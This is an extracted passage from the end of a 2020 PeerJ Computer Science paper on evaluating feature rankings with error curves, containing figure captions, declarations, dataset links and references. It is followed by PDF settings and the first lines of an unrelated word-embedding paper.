● ● ● ● ● ● ● ● ● ● 1 3 7 11 15 19 ● ● ● infoGain rforest relief svmRfe random A 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 10 18 26 34 ● ● ● infoGain rforest relief svmRfe random B 0 .2 0 .4 0 .6 0 .8 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 3 7 11 15 19 ● ● ● infoGain rforest relief svmRfe random C 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 10 18 26 34 ● ● ● infoGain rforest relief svmRfe random D 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 3 7 11 15 19 ● ● infoGain rforest relief svmRfe E 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 2 10 18 26 34 ● ● infoGain rforest relief svmRfe F Figure A9 Ranking quality assessment for datasets image (A, C and E) and ionosphere (B, D and F) in terms of the FFA (A and B) and RFA curves (C and D), and rankings’ stability estimates (E and F). The FFA/RFA curves are obtained by using SVMs. Full-size DOI: 10.7717/peerj-cs.310/fig-A9 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 32/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-A9 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● 1 2 3 4 ● ● ● infoGain rforest relief svmRfe random A 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 5 13 21 29 37 45 60 ● ● ● infoGain rforest relief svmRfe random B 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● 1 2 3 4 ● ● ● infoGain rforest relief svmRfe random C 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 5 13 21 29 37 45 60 ● ● ● infoGain rforest relief svmRfe random D 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● 1 2 3 4 ● ● infoGain rforest relief svmRfe E 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ●● ●●● ●●●●●●●●●● ●●● ●●● ●●●● ●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●● ●●●●●●●● 6 12 18 24 30 36 42 48 54 60 ● ● infoGain rforest relief svmRfe F Figure A10 Ranking quality assessment for datasets iris (A, C and E) and sonar (B, D and F) in terms of the FFA (A and B) and RFA curves (C and D), and rankings’ stability estimates (E and F). The FFA/RFA curves are obtained by using SVMs. Full-size DOI: 10.7717/peerj-cs.310/fig-A10 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 33/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-A10 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 1 .0 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 3 7 11 15 19 23 27 ● ● ● infoGain rforest relief svmRfe random A 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 4 8 12 16 ● ● ● infoGain rforest relief svmRfe random B 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 1 .0 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 3 7 11 15 19 23 27 ● ● ● infoGain rforest relief svmRfe random C 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 4 8 12 16 ● ● ● infoGain rforest relief svmRfe random D 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 3 7 11 15 19 23 27 ● ● infoGain rforest relief svmRfe E 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 4 8 12 16 ● ● infoGain rforest relief svmRfe F Figure A11 Ranking quality assessment for datasets tic-tac-toe (A, C and E) and vote (B, D and F) in terms of the FFA (A and B) and RFA curves (C and D), and rankings’ stability estimates (E and F). The FFA/RFA curves are obtained by using SVMs. Full-size DOI: 10.7717/peerj-cs.310/fig-A11 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 34/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-A11 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 5 9 13 17 21 ● ● ● infoGain rforest relief svmRfe random A 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 1 .0 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 3 5 7 9 11 13 ● ● ● infoGain rforest relief svmRfe random B 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 5 9 13 17 21 ● ● ● infoGain rforest relief svmRfe random C 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 1 .0 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 3 5 7 9 11 13 ● ● ● infoGain rforest relief svmRfe random D 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 5 9 13 17 21 ● ● infoGain rforest relief svmRfe E 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 3 5 7 9 11 13 ● ● infoGain rforest relief svmRfe F Figure A12 Ranking quality assessment for datasets waveform (A, C and E) and wine (B, D and F) in terms of the FFA (A and B) and RFA curves (C and D), and rankings’ stability estimates (E and F). The FFA/RFA curves are obtained by using SVMs. Full-size DOI: 10.7717/peerj-cs.310/fig-A12 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 35/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-A12 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by The Ad Futura Slovene Human Resources Development and Scholarship Fund, Slovenian Research Agency (through the grants J2-9230 and N2-0128 and a young researcher grant), the European Commission through the grants TAILOR (H2020-ICT-952215) and AI4EU (H2020-ICT-825619). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: The Ad Futura Slovene Human Resources Development and Scholarship Fund, Slovenian Research Agency: J2-9230 and N2-0128. TAILOR (H2020-ICT-952215) and AI4EU (H2020-ICT-825619). Competing Interests The authors declare that they have no competing interests. Author Contributions � Ivica Slavkov conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Matej Petković performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Pierre Geurts conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � Dragi Kocev conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � Sašo Džeroski conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The code for constructing the curves is available at GitHub: https://github.com/ Petkomat/fr-eval-curves. The code for constructing the feature rankings and predictive models used the methods (feature ranking and predictive modeling) implemented in Weka 3.6: https://www.cs. waikato.ac.nz/~ml/weka/. The following datasets are available from the UCI repository: https://archive.ics.uci.edu/ ml/datasets.php Credit approval, Arrhythmia, Balance Scale, Breast Cancer Wisconsin (Original), Breast Cancer, Car Evaluation, Chess (King-Rook vs. King-Pawn), Statlog (German Credit Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 36/39 https://github.com/Petkomat/fr-eval-curves https://github.com/Petkomat/fr-eval-curves https://www.cs.waikato.ac.nz/~ml/weka/ https://www.cs.waikato.ac.nz/~ml/weka/ https://archive.ics.uci.edu/ml/datasets.php https://archive.ics.uci.edu/ml/datasets.php https://archive.ics.uci.edu/ml/datasets/Statlog+%28Australian+Credit+Approval%29 https://archive.ics.uci.edu/ml/datasets/Arrhythmia https://archive.ics.uci.edu/ml/datasets/Balance+Scale https://archive.ics.uci.edu/ml/datasets/Breast+Cancer+Wisconsin+%28Original%29 https://archive.ics.uci.edu/ml/datasets/Breast+Cancer https://archive.ics.uci.edu/ml/datasets/Car+Evaluation https://archive.ics.uci.edu/ml/datasets/Chess+%28King-Rook+vs.+King-Pawn%29 https://archive.ics.uci.edu/ml/datasets/Statlog+%28German+Credit+Data%29 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ Data), Statlog (Heart), Heart Disease (for Cleveland and Hungarian data), Hepatitis, Image Segmentation, Ionosphere, Iris, Connectionist Bench (Sonar, Mines vs. Rocks), Tic-Tac-Toe Endgame, Congressional Voting Records, Waveform Database Generator (Version 1), Wine. The Pima Indians Diabetes data (previously available at the UCI repository) is now available at OpenML: https://www.openml.org/d/37. The following datasets are available from the Bioinformatics Laboratory: https://file.biolab.si/biolab/supp/bi-cancer/projections/index.html. AML prognosis, bladder cancer, breast cancer, childhood ALL, CML treatment, breast & colon (colon part of the data set), DLBCL, leukemia, MLL, prostate, SRBCT. Three additional datasets (aapc, diversity, water) are available at GitLab: http://source.ijs.si/data/classification-data. REFERENCES Aha D, Kibler D. 1991. Instance-based learning algorithms. Machine Learning 6:37–66. Arceo-Vilas A, Fernandez-Lozano C, Pita S, Pértega-Díaz S, Pazos A. 2020. A redundancy- removing feature selection algorithm for nominal data. PeerJ Computer Science 1:e24 DOI 10.7717/peerj-cs.24. Bakr GH, Hofmann T, Schölkopf B, Smola AJ, Taskar B, Vishwanathan SV. 2007. Predicting structured data. Cambridge: The MIT Press. Biesiada J, Duch W, Kachel A, Paucha S. 2005. Feature ranking methods based on information entropy with parzen windows. In: International Conference on Research in Electrotechnology and Applied Informatics, Katowice, Poland. Boucheham A, Batouche M. 2014. Robust biomarker discovery for cancer diagnosis based on meta-ensemble feature selection. In: 2014 Science and Information Conference. 452–560. Breiman L. 2001. Random forests. Machine Learning 45(1):5–32 DOI 10.1023/A:1010933404324. Cortes C, Vapnik V. 1995. Support-vector networks. Machine Learning 20(3):273–297. Duch W, Wieczorek T, Biesiada J. 2004. Comparison of feature ranking methods based on information entropy. In: IEEE International Conference on Neural Networks - Conference Proceedings. Vol. 2. Piscataway: IEEE, 1415–1419. Džeroski S, Demšar D, Grbović J. 2000. Predicting chemical parameters of river water quality from bioindicator data. Applied Intelligence 13(1):7–17 DOI 10.1023/A:1008323212047. Džeroski S, Potamias G, Moustakis V, Charissis G. 1997. Automated revision of expert rules for treating acute abdominal pain in children. In: Artificial Intelligence in Medicine - AIME, LNCS 1211, 98–109. Furlanello C, Serafini M, Merler S, Jurman G. 2003. Entropy-based gene ranking without selection bias for the predictive classification of microarray data. BMC Bioinformatics 4(1):54 DOI 10.1186/1471-2105-4-54. Guyon I, Weston J, Barnhill S, Vapnik V. 2002. Gene selection for cancer classification using support vector machines. Machine Learning 46(1/3):389–422 DOI 10.1023/A:1012487302797. Guzmán-Martnez R, Alaiz-Rodrguez R. 2011. Feature selection stability assessment based on the Jensen-Shannon divergence. Lecture Notes in Computer Science 6911:597–612. Henzgen S, Hüllermeier E. 2015. Weighted rank correlation: a flexible approach based on fuzzy order relations. In: Appice A, Rodrigues PP, Santos Costa V, Gama J, Jorge A, Soares C, eds. Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 37/39 https://archive.ics.uci.edu/ml/datasets/Statlog+%28German+Credit+Data%29 https://archive.ics.uci.edu/ml/datasets/Statlog+(Heart) https://archive.ics.uci.edu/ml/datasets/Heart+Disease https://archive.ics.uci.edu/ml/datasets/Hepatitis https://archive.ics.uci.edu/ml/datasets/Image+Segmentation https://archive.ics.uci.edu/ml/datasets/Ionosphere https://archive.ics.uci.edu/ml/datasets/Iris https://archive.ics.uci.edu/ml/datasets/Connectionist+Bench+%28Sonar%2C+Mines+vs.+Rocks%29 https://archive.ics.uci.edu/ml/datasets/Tic-Tac-Toe+Endgame https://archive.ics.uci.edu/ml/datasets/Congressional+Voting+Records https://archive.ics.uci.edu/ml/datasets/Waveform+Database+Generator+(Version+1) https://archive.ics.uci.edu/ml/datasets/Waveform+Database+Generator+(Version+1) https://archive.ics.uci.edu/ml/datasets/Wine https://www.openml.org/d/37 https://file.biolab.si/biolab/supp/bi-cancer/projections/index.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/AMLGSE2191.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/bladderGSE89.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/BCGSE349_350.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/ALLGSE412_pred_poTh.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/CMLGSE2535.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/BC_CCGSE3726_frozen.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/DLBCL.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/leukemia.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/MLL.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/prostata.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/SRBCT.html http://source.ijs.si/data/classification-data http://dx.doi.org/10.7717/peerj-cs.24 http://dx.doi.org/10.1023/A:1010933404324 http://dx.doi.org/10.1023/A:1008323212047 http://dx.doi.org/10.1186/1471-2105-4-54 http://dx.doi.org/10.1023/A:1012487302797 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ Machine Learning and Knowledge Discovery in Databases. Berlin: Springer International Publishing, 422–437. John GH, Langley P. 1995. Estimating continuous distributions in Bayesian classifiers. In: Proc. Eleventh Conference on Uncertainty in Artificial Intelligence, San Mateo, CA. Burlington: Morgan Kaufmann, 338–345. Jong K, Mary J, Cornuéjols A, Marchiori E, Sebag M. 2004. Ensemble feature ranking. In: PKDD - LNCS 2302. 267–278. Jurman G, Merler S, Barla A, Paoli S, Galea A, Furlanello C. 2008. Algebraic stability indicators for ranked lists in molecular profiling. Bioinformatics 24(2):258–264 DOI 10.1093/bioinformatics/btm550. Kalousis A, Prados J, Hilario M. 2007. Stability of feature selection algorithms: a study on high-dimensional spaces. Knowledge and Information Systems 12(1):95–116 DOI 10.1007/s10115-006-0040-8. Khoshgoftaar TM, Fazelpour A, Wang H, Wald R. 2013. A survey of stability analysis of feature subset selection techniques. In: IEEE 14th International Conference on Information Reuse Integration (IRI). Piscataway: IEEE, 424–431. Lance GN, Williams WT. 1966. Computer programs for hierarchical polythetic classification (‘similarity analyses’). Computer Journal 9(1):60–64 DOI 10.1093/comjnl/9.1.60. Lance GN, Williams WT. 1967. Mixed-data classificatory programs i-agglomerative systems. Australian Computer Journal 1:15–20. Li Z, Gu W. 2015. A redundancy-removing feature selection algorithm for nominal data. PeerJ Computer Science 3:e1184 DOI 10.7287/peerj.preprints.1184v1. Liang J, Yang S, Winstanley A. 2008. Invariant optimal feature selection: a distance discriminant and feature ranking based solution. Pattern Recognition 41(5):1429–1439 DOI 10.1016/j.patcog.2007.10.018. Liu T, Liu S, Chen Z, Ma W-Y. 2003. An evaluation on feature selection for text clustering. In: Fawcett T, Mishra N, eds. ICML. Menlo Park: The AAAI Press, 488–495. Mramor M, Leban G, Demšar J, Zupan B. 2007. Visualization-based cancer microarray data classification analysis. Bioinformatics 23(16):2147–2154 DOI 10.1093/bioinformatics/btm312. Muja M, Lowe DG. 2009. Fast approximate nearest neighbors with automatic algorithm configuration. In: Ranchordas A, Araújo H, eds. VISAPP (1). Porto: INSTICC Press, 331–340. Nardone D, Ciaramella A, Staiano A. 2019. A redundancy-removing feature selection algorithm for nominal data. PeerJ Computer Science 1:e24 DOI 10.7717/peerj-cs.24. Newman CBD, Merz C. 1998. UCI repository of machine learning databases. Available at http://archive.ics.uci.edu/ml/index.php (accessed 13 December 2015). Nilsson R, Peña JM, Björkegren J, Tegnér J. 2007. Consistent feature selection for pattern recognition in polynomial time. Journal of Machine Learning Research 8:589–612. Nogueira S, Sechidis K, Brown G. 2017. On the stability of feature selection algorithms. Journal of Machine Learning Research 18(1):6345–6398. Paoli S, Jurman G, Albanese D, Merler S, Furlanello C. 2005. Semisupervised profiling of gene expressions and clinical data. In: Proc. Sixth International Conference on Fuzzy Logic and Applications. 284–289. Quinlan R. 1993. C4.5: programs for machine learning. San Mateo: Morgan Kaufmann Publishers. Robnik-Šikonja M, Kononenko I. 2003. Theoretical and empirical analysis of ReliefF and RReliefF. Machine Learning 53(1/2):23–69 DOI 10.1023/A:1025667309714. Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 38/39 http://dx.doi.org/10.1093/bioinformatics/btm550 http://dx.doi.org/10.1007/s10115-006-0040-8 http://dx.doi.org/10.1093/comjnl/9.1.60 http://dx.doi.org/10.7287/peerj.preprints.1184v1 http://dx.doi.org/10.1016/j.patcog.2007.10.018 http://dx.doi.org/10.1093/bioinformatics/btm312 http://dx.doi.org/10.7717/peerj-cs.24 http://archive.ics.uci.edu/ml/index.php http://dx.doi.org/10.1023/A:1025667309714 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ Saeys Y, Abeel T, De Peer YV. 2008. Robust feature selection using ensemble feature selection techniques. In: Daelemans W, Goethals B, Morik K, eds. Machine Learning and Knowledge Discovery in Databases. ECML PKDD 2008, Lecture Notes in Computer Science. Vol. 5212. Berlin: Springer, 313–325. Slavkov I, Petković M, Kocev D, Džeroski S. 2018. Quantitative score for assessing the quality of feature rankings. Informatica 42(1):43–52. Tsang IW, Kwok JT, Cheung P-M. 2005. Core vector machines: fast svm training on very large data sets. Journal of Machine Learning Research 6:363–392. Verikas A, Gelzinis A, Bacauskiene M. 2011. Mining data with random forests: a survey and results of new tests. Pattern Recognition 44(2):330–349 DOI 10.1016/j.patcog.2010.08.011. Wang Y, Jha S, Chaudhuri K. 2018. Analyzing the robustness of nearest neighbors to adversarial examples. In: Proceedings of the 35th International Conference on Machine Learning (ICML), PMLR 80. Stockholm, Sweden, 5120–5129. Xu H, Caramanis C, Mannor S. 2009. Robustness and regularization of support vector machines. Journal of Machine Learning Research 10:1485–1510. Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 39/39 http://dx.doi.org/10.1016/j.patcog.2010.08.011 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ Error curves for evaluating the quality of feature rankings Introduction Related work A method for evaluating feature rankings Empirical evaluation of ffa/rfa curve properties Feature ranking comparison on real-worlds datasets Conclusions Appendix 1 Appendix 2 Appendix 3 Appendix 4 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_7jjkktfhpnadnpukptzosc5hta ---- Enriching Word Vectors with Subword Information Piotr Bojanowski∗ and Edouard Grave∗ and Armand Joulin and Tomas Mikolov Facebook AI Research {bojanowski,egrave,ajoulin,tmikolov}@fb.com Abstract Continuous word representations, trained on large unlabeled corpora are useful for many natural language processing tasks. Popular models that learn such representations ignore the 